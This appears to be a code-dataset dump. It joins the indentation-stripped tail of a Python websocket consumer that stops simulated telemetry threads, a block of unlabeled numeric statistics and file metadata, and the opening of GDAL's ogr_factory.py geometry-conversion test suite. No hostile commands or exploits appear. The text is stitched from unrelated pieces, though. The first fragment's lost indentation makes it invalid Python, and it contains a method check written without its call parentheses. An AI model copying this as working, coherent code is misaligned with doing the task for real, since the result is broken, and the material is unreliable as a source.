# If not successful send back error message
if global_obj.simulator_at_threads[3].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread four.'
if successful:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 4 and fake telemetry 4 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 4 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry 4 thread was not initialized and fake at thread 4 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is not initialized
elif global_obj.simulator_at_threads[3] is None:
# Check if simulator thread is alive, then kill that thread
if global_obj.simulator_threads[3].is_alive():
global_obj.hub_to_simulator_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[3].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread four.'
if successful:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 4 and fake at 4 was not '
'initialized. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake telemetry 4 thread was never initialized.',
'attempt': content.get('attempt')
}
}))
# If it is not alive then it is already stopped, send back success
else:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake at thread 4 thread was not initialized and fake telemetry 4 was '
'already killed. Proceed',
'attempt': content.get('attempt')
}
}))
# Check if both have been initialized
else:
# Check if both are alive, then kill both
if global_obj.simulator_threads[3].is_alive and global_obj.simulator_at_threads[3].is_alive():
global_obj.frontend_to_hub_queue.put({'type': 'stop_fake_telemetry_four'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
atSimulatorMessage = ''
global_obj.simulator_threads[3].join(2.0)
if global_obj.simulator_threads[3].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake telemetry thread four.'
global_obj.simulator_at_threads[3].join(2.0)
if global_obj.simulator_at_threads[3].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread four.'
if successful:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry four. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + '' + atSimulatorMessage,
'attempt': content.get('attempt')
}
}))
# Check if only simulator thread is alive, then only kill simulator thread
elif global_obj.simulator_threads[3].is_alive():
global_obj.hub_to_simulator_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
simulatorMessage = ''
global_obj.simulator_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_threads[3].is_alive():
successful = False
simulatorMessage = 'There was an error stopping fake simulator thread four.'
if successful:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake telemetry thread 4 and fake at 4 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': simulatorMessage + ' Fake telemetry 4 thread was alive.',
'attempt': content.get('attempt')
}
}))
# Check if only at thread is alive, then only kill at thread
elif global_obj.simulator_at_threads[3].is_alive():
global_obj.hub_to_simulator_at_queues[3].put({'type': 'stop'})
# Ensure it gets stopped
successful = True
atSimulatorMessage = ''
global_obj.simulator_at_threads[3].join(2.0)
# If not successful send back error message
if global_obj.simulator_at_threads[3].is_alive():
successful = False
atSimulatorMessage = 'There was an error stopping fake at thread four.'
if successful:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Success stopping fake at thread 4 and fake telemetry 4 was not '
'alive. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'error',
'message': atSimulatorMessage + ' Fake telemetry 4 thread was never alive.',
'attempt': content.get('attempt')
}
}))
# Check if both are dead then said back already killed message
else:
r.srem('fake-telemetry-four', self.channel_name)
if r.scard("fake-telemetry-four") != 0:
r.delete("fake-telemetry-four")
global_obj.frontend_to_hub_queue.put({'type': 'unassign_fake_telemetry_four'})
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'Fake telemetry thread 4 and fake at thread 4 were both dead. Proceed',
'attempt': content.get('attempt')
}
}))
else:
self.send(json.dumps({
'type': 'stop_telemetry_response',
'content': {
'status': 'success',
'message': 'This user was not assigned a telemetry. Proceed.',
'attempt': content.get('attempt')
}
}))
elif content.get('type') == 'get_parameters':
if r.sismember('seclss-group-users', self.channel_name) == 1:
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params', 'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
elif r.sismember('hera-group-users', self.channel_name) == 1:
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params', 'channel_layer': self.channel_layer,
'channel_name': self.channel_name})
elif r.sismember('fake-telemetry-one', self.channel_name) == 1:
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params', 'channel_name': self.channel_name})
elif r.sismember('fake-telemetry-two', self.channel_name) == 1:
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params', 'channel_name': self.channel_name})
elif r.sismember('fake-telemetry-three', self.channel_name) == 1:
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params', 'channel_name': self.channel_name})
elif r.sismember('fake-telemetry-four', self.channel_name) == 1:
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params', 'channel_name': self.channel_name})
elif content.get('msg_type') == 'get_real_telemetry_params':
frontend_to_hub_queue.put({'type': 'get_real_telemetry_params'})
elif content.get('msg_type') == 'get_hera_telemetry_params':
frontend_to_hub_queue.put({'type': 'get_hera_telemetry_params'})
elif content.get('msg_type') == 'get_fake_telemetry_params':
frontend_to_hub_queue.put({'type': 'get_fake_telemetry_params', 'channel_name': self.channel_name})
elif content.get('type') == 'ping':
signal = {'type': 'ping', 'channel_name': self.channel_name}
frontend_to_hub_queue.put(signal)
elif content.get('type') == 'add_User':
username = content.get('userName')
userChannelNames[username] = self.channel_name
userChannelLayers[username] = self.channel_layer
elif content.get('type') == 'remove_User':
username = content.get('userName')
del userChannelNames[username]
del userChannelLayers[username]
def hub_thread_response(self, event):
self.send(json.dumps(event))
def stop_telemetry_response(self, event):
self.send(json.dumps(event))
def fake_telemetry_response(self, event):
self.send(json.dumps(event))
def real_telemetry_response(self, event):
self.send(json.dumps(event))
def hera_telemetry_response(self, event):
self.send(json.dumps(event))
def console_text(self, event):
self.send(json.dumps(event))
def telemetry_update(self, event):
self.send(json.dumps(event))
def initialize_telemetry(self, event):
self.send(json.dumps(event))
def symptoms_report(self, event):
self.send(json.dumps(event))
def ws_configuration_update(self, event):
self.send(json.dumps(event))
def finish_experiment_from_mcc(self, event):
self.send(json.dumps(event))
def turn_off_alarms(self, event):
self.send(json.dumps(event))
| 65.70661
| 126
| 0.407
| 27,541
| 339,966
| 4.808286
| 0.010493
| 0.064157
| 0.051108
| 0.034661
| 0.980147
| 0.977187
| 0.970595
| 0.967295
| 0.962628
| 0.949556
| 0
| 0.007169
| 0.521973
| 339,966
| 5,173
| 127
| 65.719312
| 0.807689
| 0.08815
| 0
| 0.897073
| 0
| 0.000488
| 0.185143
| 0.038345
| 0
| 0
| 0
| 0
| 0
| 1
| 0.003902
| false
| 0
| 0.003415
| 0
| 0.008537
| 0.035854
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
40655400ed75695f443623c8ebac44c2333388bd
| 32,385
|
py
|
Python
|
autotest/ogr/ogr_factory.py
|
robe2/gdal
|
78573efe69f1506c112209501068c0b043438295
|
[
"MIT"
] | null | null | null |
autotest/ogr/ogr_factory.py
|
robe2/gdal
|
78573efe69f1506c112209501068c0b043438295
|
[
"MIT"
] | null | null | null |
autotest/ogr/ogr_factory.py
|
robe2/gdal
|
78573efe69f1506c112209501068c0b043438295
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# $Id$
#
# Project: GDAL/OGR Test Suite
# Purpose: Test some geometry factory methods, like arc stroking.
# Author: Frank Warmerdam <warmerdam@pobox.com>
#
###############################################################################
# Copyright (c) 2008, Frank Warmerdam <warmerdam@pobox.com>
# Copyright (c) 2010-2012, Even Rouault <even dot rouault at mines-paris dot org>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
###############################################################################
import sys
sys.path.append( '../pymod' )
import ogrtest
import gdaltest
from osgeo import gdal
from osgeo import ogr
def save_as_csv( geom, filename ):
csv = 'ID,WKT\n0,"%s"\n' % geom.ExportToWkt()
open('/home/warmerda/'+filename,'w').write(csv)
###############################################################################
# 30 degree rotated ellipse, just one quarter.
def ogr_factory_1():
geom = ogr.ApproximateArcAngles( 20, 30, 40, 7, 3.5, 30.0, 270.0, 360.0, 6.0 )
expected_geom = 'LINESTRING (21.75 33.031088913245533 40,22.374083449152831 32.648634669593925 40,22.972155943227843 32.237161430239802 40,23.537664874825239 31.801177382099848 40,24.064414409750082 31.345459257641004 40,24.546633369868303 30.875 40,24.979038463342047 30.394954059253475 40,25.356892169480634 29.910580919184319 40,25.676054644008637 29.427187473276717 40,25.933029076066084 28.95006988128063 40,26.125 28.484455543377237 40,26.249864142195264 28.035445827688662 40,26.306253464980482 27.607960178621322 40,26.293550155134998 27.206682218403525 40,26.211893392779814 26.836008432340218 40,26.062177826491073 26.5 40)'
if ogrtest.check_feature_geometry( geom, expected_geom ):
return 'fail'
else:
return 'success'
###############################################################################
# Test forceToPolygon()
def ogr_factory_2():
src_wkt = 'MULTIPOLYGON (((0 0,100 0,100 100,0 0)))'
exp_wkt = 'POLYGON((0 0,100 0,100 100,0 0))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTISURFACE (((0 0,100 0,100 100,0 0)))'
exp_wkt = 'POLYGON((0 0,100 0,100 100,0 0))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'CURVEPOLYGON ((0 0,100 0,100 100,0 0))'
exp_wkt = 'POLYGON((0 0,100 0,100 100,0 0))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'CURVEPOLYGON (CIRCULARSTRING(0 0,0 1,0 2,1 2,2 2,2 1,2 0,1 0,0 0))'
exp_wkt = 'POLYGON ((0 0,0 1,0 2,1 2,2 2,2 1,2 0,1 0,0 0))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
return 'success'
###############################################################################
# Test forceToMultiPolygon()
def ogr_factory_3():
src_wkt = 'POLYGON((0 0,100 0,100 100,0 0))'
exp_wkt = 'MULTIPOLYGON (((0 0,100 0,100 100,0 0)))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'GEOMETRYCOLLECTION(POLYGON((0 0,100 0,100 100,0 0)))'
exp_wkt = 'MULTIPOLYGON (((0 0,100 0,100 100,0 0)))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'CURVEPOLYGON ((0 0,100 0,100 100,0 0))'
exp_wkt = 'MULTIPOLYGON (((0 0,100 0,100 100,0 0)))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTISURFACE (((0 0,100 0,100 100,0 0)))'
exp_wkt = 'MULTIPOLYGON (((0 0,100 0,100 100,0 0)))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiPolygon( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
return 'success'
###############################################################################
# Test forceToMultiPoint()
def ogr_factory_4():
src_wkt = 'POINT(2 5 3)'
exp_wkt = 'MULTIPOINT(2 5 3)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiPoint( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'GEOMETRYCOLLECTION(POINT(2 5 3),POINT(4 5 5))'
exp_wkt = 'MULTIPOINT(2 5 3,4 5 5)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiPoint( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
return 'success'
###############################################################################
# Test forceToMultiLineString()
def ogr_factory_5():
src_wkt = 'LINESTRING(2 5,10 20)'
exp_wkt = 'MULTILINESTRING((2 5,10 20))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'GEOMETRYCOLLECTION(LINESTRING(2 5,10 20),LINESTRING(0 0,10 10))'
exp_wkt = 'MULTILINESTRING((2 5,10 20),(0 0,10 10))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'POLYGON((2 5,10 20),(0 0,10 10))'
exp_wkt = 'MULTILINESTRING((2 5,10 20),(0 0,10 10))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTIPOLYGON(((2 5,10 20),(0 0,10 10)),((2 5,10 20)))'
exp_wkt = 'MULTILINESTRING((2 5,10 20),(0 0,10 10),(2 5,10 20))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToMultiLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
return 'success'
###############################################################################
# Test robustness of forceToXXX() primitives with various inputs (#3504)
def ogr_factory_6():
src_wkt_list = [ None,
'POINT EMPTY',
'LINESTRING EMPTY',
'POLYGON EMPTY',
'MULTIPOINT EMPTY',
'MULTILINESTRING EMPTY',
'MULTIPOLYGON EMPTY',
'GEOMETRYCOLLECTION EMPTY',
'POINT(0 0)',
'LINESTRING(0 0)',
'POLYGON((0 0))',
'POLYGON(EMPTY,(0 0),EMPTY,(1 1))',
'MULTIPOINT(EMPTY,(0 0),EMPTY,(1 1))',
'MULTILINESTRING(EMPTY,(0 0),EMPTY,(1 1))',
'MULTIPOLYGON(((0 0),EMPTY,(1 1)),EMPTY,((2 2)))',
'GEOMETRYCOLLECTION(POINT EMPTY)',
'GEOMETRYCOLLECTION(LINESTRING EMPTY)',
'GEOMETRYCOLLECTION(POLYGON EMPTY)',
'GEOMETRYCOLLECTION(MULTIPOINT EMPTY)',
'GEOMETRYCOLLECTION(MULTILINESTRING EMPTY)',
'GEOMETRYCOLLECTION(MULTIPOLYGON EMPTY)',
'GEOMETRYCOLLECTION(GEOMETRYCOLLECTION EMPTY)',
'GEOMETRYCOLLECTION(POINT(0 0))',
'GEOMETRYCOLLECTION(LINESTRING(0 0),LINESTRING(1 1))',
'GEOMETRYCOLLECTION(POLYGON((0 0),EMPTY,(2 2)), POLYGON((1 1)))',
'CURVEPOLYGON EMPTY',
'CURVEPOLYGON ((0 0,0 1,1 1,1 0,0 0))',
'CURVEPOLYGON (CIRCULARSTRING(0 0,1 0,0 0))',
'COMPOUNDCURVE EMPTY',
'COMPOUNDCURVE ((0 0,0 1,1 1,1 0,0 0))',
'COMPOUNDCURVE (CIRCULARSTRING(0 0,1 0,0 0))',
'CIRCULARSTRING EMPTY',
'CIRCULARSTRING (0 0,1 0,0 0)',
'MULTISURFACE EMPTY',
'MULTISURFACE (((0 0,0 1,1 1,1 0,0 0)))',
'MULTISURFACE (CURVEPOLYGON((0 0,0 1,1 1,1 0,0 0)))',
'MULTICURVE EMPTY',
'MULTICURVE ((0 0,0 1))',
'MULTICURVE (COMPOUNDCURVE((0 0,0 1)))',
'MULTICURVE (CIRCULARSTRING (0 0,1 0,0 0))',
]
for src_wkt in src_wkt_list:
if src_wkt is None:
src_geom = None
else:
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
ogr.ForceToPolygon( src_geom )
ogr.ForceToMultiPolygon( src_geom )
ogr.ForceToMultiPoint( src_geom )
ogr.ForceToMultiLineString( src_geom )
ogr.ForceToLineString( src_geom )
for target_type in range(ogr.wkbMultiSurface):
gdal.PushErrorHandler('CPLQuietErrorHandler')
ogr.ForceTo( src_geom, 1 +target_type )
gdal.PopErrorHandler()
#print(src_geom.ExportToWkt(), dst_geom1.ExportToWkt(), dst_geom2.ExportToWkt(), dst_geom3.ExportToWkt(), dst_geom4.ExportToWkt())
return 'success'
###############################################################################
# Test forceToLineString()
def ogr_factory_7():
src_wkt = 'LINESTRING(2 5,10 20)'
exp_wkt = 'LINESTRING(2 5,10 20)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTILINESTRING((2 5,10 20))'
exp_wkt = 'LINESTRING(2 5,10 20)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTICURVE((2 5,10 20))'
exp_wkt = 'LINESTRING(2 5,10 20)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTICURVE(COMPOUNDCURVE((2 5,10 20)))'
exp_wkt = 'LINESTRING(2 5,10 20)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTILINESTRING((2 5,10 20),(3 4,30 40))'
exp_wkt = 'MULTILINESTRING((2 5,10 20),(3 4,30 40))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTILINESTRING((2 5,10 20),(10 20,30 40))'
exp_wkt = 'LINESTRING (2 5,10 20,30 40)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'GEOMETRYCOLLECTION(LINESTRING(2 5,10 20),LINESTRING(10 20,30 40))'
exp_wkt = 'LINESTRING (2 5,10 20,30 40)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTILINESTRING((2 5,10 20),(10 20))'
exp_wkt = 'MULTILINESTRING((2 5,10 20),(10 20))'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'MULTILINESTRING((2 5,10 20),(10 20,30 40),(30 40,50 60))'
exp_wkt = 'LINESTRING (2 5,10 20,30 40,50 60)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'POLYGON ((0 0,0 1,1 1,1 0,0 0))'
exp_wkt = 'LINESTRING (0 0,0 1,1 1,1 0,0 0)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'CURVEPOLYGON ((0 0,0 1,1 1,1 0,0 0))'
exp_wkt = 'LINESTRING (0 0,0 1,1 1,1 0,0 0)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
src_wkt = 'CURVEPOLYGON (COMPOUNDCURVE((0 0,0 1,1 1,1 0,0 0)))'
exp_wkt = 'LINESTRING (0 0,0 1,1 1,1 0,0 0)'
src_geom = ogr.CreateGeometryFromWkt( src_wkt )
dst_geom = ogr.ForceToLineString( src_geom )
if ogrtest.check_feature_geometry( dst_geom, exp_wkt ):
print(dst_geom.ExportToWkt())
return 'fail'
return 'success'
###############################################################################
# Test forceTo()
def ogr_factory_8():
tests = [ ('POINT(2 5)', 'MULTIPOINT (2 5)', ogr.wkbMultiPoint ),
('LINESTRING(2 5,10 20)', 'LINESTRING(2 5,10 20)', ogr.wkbLineString ),
('LINESTRING(2 5,10 20)', 'COMPOUNDCURVE ((2 5,10 20))', ogr.wkbCompoundCurve ),
('LINESTRING(2 5,10 20)', 'MULTILINESTRING ((2 5,10 20))', ogr.wkbMultiLineString ),
('LINESTRING(2 5,10 20)', 'MULTICURVE ((2 5,10 20))', ogr.wkbMultiCurve ),
('LINESTRING(2 5,10 20)', None, ogr.wkbPolygon ),
('LINESTRING(2 5,10 20)', None, ogr.wkbCurvePolygon ),
('LINESTRING(2 5,10 20)', None, ogr.wkbMultiSurface ),
('LINESTRING(2 5,10 20)', None, ogr.wkbMultiPolygon ),
('LINESTRING(0 0,0 1,1 1,0 0)', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('LINESTRING(0 0,0 1,1 1,0 0)', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('LINESTRING(0 0,0 1,1 1,0 0)', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('LINESTRING(0 0,0 1,1 1,0 0)', 'MULTISURFACE (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiSurface ),
('LINESTRING EMPTY', 'COMPOUNDCURVE EMPTY', ogr.wkbCompoundCurve ),
('LINESTRING EMPTY', 'MULTILINESTRING EMPTY', ogr.wkbMultiLineString ),
('LINESTRING EMPTY', 'MULTICURVE EMPTY', ogr.wkbMultiCurve ),
('MULTILINESTRING ((2 5,10 20))', 'LINESTRING(2 5,10 20)', ogr.wkbLineString ),
('MULTILINESTRING ((2 5,10 20))', 'COMPOUNDCURVE ((2 5,10 20))', ogr.wkbCompoundCurve ),
('MULTILINESTRING ((2 5,10 20))', 'MULTICURVE ((2 5,10 20))', ogr.wkbMultiCurve ),
('MULTILINESTRING ((2 5,10 20))', None, ogr.wkbPolygon ),
('MULTILINESTRING ((2 5,10 20))', None, ogr.wkbCurvePolygon ),
('MULTILINESTRING ((2 5,10 20))', None, ogr.wkbMultiPolygon ),
('MULTILINESTRING ((2 5,10 20))', None, ogr.wkbMultiSurface ),
('MULTILINESTRING ((0 0,0 1,1 1,0 0))', 'POLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbPolygon ),
('MULTILINESTRING ((0 0,0 1,1 1,0 0))', 'CURVEPOLYGON ((0 0,0 1,1 1,0 0))', ogr.wkbCurvePolygon ),
('MULTILINESTRING ((0 0,0 1,1 1,0 0))', 'MULTIPOLYGON (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiPolygon ),
('MULTILINESTRING ((0 0,0 1,1 1,0 0))', 'MULTISURFACE (((0 0,0 1,1 1,0 0)))', ogr.wkbMultiSurface ),
('MULTILINESTRING EMPTY', 'LINESTRING EMPTY', ogr.wkbLineString ),
('MULTILINESTRING EMPTY', 'COMPOUNDCURVE EMPTY', ogr.wkbCompoundCurve ),
('MULTILINESTRING EMPTY', 'MULTICURVE EMPTY', ogr.wkbMultiCurve ),
('CIRCULARSTRING(0 0,1 0,0 0)', 'COMPOUNDCURVE (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbCompoundCurve),
('CIRCULARSTRING(0 0,1 0,0 0)', 'MULTICURVE (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbMultiCurve),
('CIRCULARSTRING(0 0,1 0,0 0)', 'CURVEPOLYGON (CIRCULARSTRING (0 0,1 0,0 0))', ogr.wkbCurvePolygon),
('CIRCULARSTRING(0 0,1 0,0 0)', 'POLYGON ((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0))', ogr.wkbPolygon),
('CIRCULARSTRING(0 0,1 0,0 0)', 'MULTIPOLYGON (((0 0,0.116977778440514 -0.321393804843282,0.413175911166547 -0.49240387650611,0.75 -0.433012701892224,0.969846310392967 -0.171010071662835,0.969846310392967 0.171010071662835,0.75 0.433012701892224,0.413175911166547 0.49240387650611,0.116977778440514 0.321393804843282,0 0)))', ogr.wkbMultiPolygon),
